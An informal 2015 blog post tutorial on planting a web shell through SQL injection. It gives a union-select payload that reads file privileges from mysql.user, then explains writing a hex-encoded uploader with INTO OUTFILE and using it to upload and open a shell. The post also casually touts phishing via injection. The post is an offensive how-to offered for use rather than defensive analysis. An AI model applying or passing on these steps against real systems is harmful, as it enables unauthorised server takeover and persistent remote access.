Jumat, 12 Juni 2015
Uploading Shell Using SQL Injection
SQLi is a fun thing I thought, cause we can do something cool, like we can make some pop up alert, or using HTML code, and we can make phising concept inside SQL Injection. Thats awesome right? For this time I wanna share about "Uploading Shell Using SQL Injection", all you need is:
- Your must have write privileges and a writable directory (where you have to upload your shell)
- Root Path (i.e /var/www/website/ or C:\xampp\blablabla....)
- Magic Qoutes must be enable
How to check it?
group_concat(user,0x203a20,file_priv) from mysql.userSo our query will be like this
http://localhost/sqli/vuln.php?id=-1 union select group_concat(user,0x203a20,file_priv) from mysql.user-- -
If say Y after current user, we have an access. Next step is lets write uor uploader using INTO OUTFILEsyntax
'our script in here' INTO OUTFILE "filepath"You can see uploader in here "Uploader"..and then you can conver it into hexa
http://pastebin.com/PvmxDHTk (Look Here This Code)And then open it
http://localhost/sqli/uploader.php
And we can see our uploader
Upload your shell..
And open your shell
# Thanks For You All :D
Langganan:
Posting Komentar
(
Atom
)
Tidak ada komentar :
Posting Komentar